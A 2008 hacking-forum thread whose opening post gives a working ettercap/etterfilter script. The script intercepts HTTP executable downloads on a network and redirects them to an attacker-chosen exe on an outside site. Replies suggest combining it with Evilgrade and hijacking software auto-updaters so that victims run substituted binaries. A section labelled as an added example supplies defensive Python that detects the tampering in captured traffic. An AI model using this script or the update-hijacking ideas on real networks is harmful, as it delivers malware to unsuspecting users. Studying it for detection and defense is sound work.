operat0r_001 Posted August 19, 2008

ettercap / etterfilter man in the middle ownage

Basically replace any EXE downloaded with your own :)

08/14/2008 - VIDEO: http://blip.tv/file/1185726/

replace all downloaded EXE's with a 301 redirect to a different exe and site

    # replace rmccurdy with your website
    # replace the url with whatever exe you like
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("keep-alive", "close");
       replace("Keep-Alive", "close");
    }
    if (ip.proto == TCP && search(DATA.data, ": application")) {
       # enable for logging
       log(DECODED.data, "/tmp/log.log");
       msg("found EXE\n");
       # "Win32" is the first part of the exe example:
       # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
       if (search(DATA.data, "Win32")) {
          msg("doing nothing\n");
       } else {
          replace("200 OK", "301 Moved Permanently Location: http://www.rmccurdy.com/scripts/quickclean.exe ");
          msg("redirect success\n");
       }
    }
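
Added example, not part of the original post or thread: a defender-side Python check for the artifacts the filter above leaves in captured HTTP traffic, namely a same-length junk header in place of Accept-Encoding and a redirect that still carries the download's `application/` Content-Type or sends an `.exe` request to another host. The function names and the example.com / example.net traffic are constructed, and it assumes the rewritten response keeps its original headers because the filter only replaces the status text.

```python
from urllib.parse import urlsplit

KNOWN_ACCEPT = {"accept", "accept-encoding", "accept-language", "accept-charset"}

def parse_head(raw):
    """Split a raw HTTP head into (start_line, {lowercased name: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def tamper_findings(request_raw, response_raw):
    """Return indicator strings for one captured request/response pair."""
    found = []
    req_line, req = parse_head(request_raw)
    status_line, resp = parse_head(response_raw)
    # Request side: Accept-Encoding overwritten by a same-length junk name.
    if "accept-encoding" not in req:
        for name in req:
            if (name.startswith("accept-") and name not in KNOWN_ACCEPT
                    and len(name) == len("accept-encoding")):
                found.append("accept-encoding-overwritten:" + name)
    # Response side: a redirect that still carries the download's headers.
    parts = status_line.split(" ", 2)
    status = parts[1] if len(parts) > 1 else ""
    if status in ("301", "302", "303", "307", "308"):
        if resp.get("content-type", "").startswith("application/"):
            found.append("redirect-with-application-content-type")
        path = req_line.split(" ")[1] if req_line.count(" ") >= 2 else ""
        target = urlsplit(resp.get("location", "")).hostname
        host = req.get("host", "").split(":")[0].lower()
        if path.lower().endswith(".exe") and target and target != host:
            found.append("exe-request-redirected-to:" + target)
    return found

# Constructed sample traffic (hypothetical hosts), not captured data.
CLEAN_REQ = ("GET /files/setup.exe HTTP/1.1\r\nHost: downloads.example.com\r\n"
             "Accept-Encoding: gzip\r\nConnection: keep-alive\r\n\r\n")
CLEAN_RESP = ("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
              "Content-Length: 1024\r\n\r\n")
BAD_REQ = CLEAN_REQ.replace("Accept-Encoding", "Accept-Rubbish!")
BAD_RESP = ("HTTP/1.1 301 Moved Permanently\r\nLocation: http://other.example.net/x.exe\r\n"
            "Content-Type: application/octet-stream\r\nConnection: close\r\n\r\n")

if __name__ == "__main__":
    print(tamper_findings(BAD_REQ, BAD_RESP))
```

None of these indicators exist on an HTTPS download, and an updater that verifies a signature or pinned hash before running the file rejects the substituted binary regardless.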

Sparda Posted August 19, 2008

How often are executable files downloaded? Not often. You'd need to do something else like rewrite links to download an executable as well.

mubix Posted August 19, 2008

Dude, Boris, it's a good script, especially if you integrate it with Evilgrade. Yes, rewriting links would be good too but then you are a lot more detectable. Now, if you can download, modify images into GIFs and rewrite links while adding execution to those GIFs. THEN you have something.

PileOfMush Posted August 21, 2008

So many apps check for updates every time you start them now... I wonder if anyone has ever compiled a list of the most popular of these apps to target for MITM redirection attacks. Like if Firefox were redirected to an exploit site and said "oh look, new version available"... and the exe offered wasn't called "haxploit-1337.exe" a lot of ppl would run it.

operat0r_001 (Author) Posted January 14, 2009

yes you can use mod rewrite or a tinyhttpd filter etc but this is small and only requires root and ettercap and is easy to change

DingleBerries Posted January 14, 2009

Nice work operator, I can see plenty of uses for this.

Machstorm Posted January 15, 2009

There is a Man in the Middle plug-in that you can get for Ettercap, then all you have to do is supply the website with modified links. I did something like this for Cyber Security and redirected traffic from Microsoft.com to a site about switching to Linux. I imagine if you somehow spoofed the site that you wanted to, you could modify the links to suit your needs.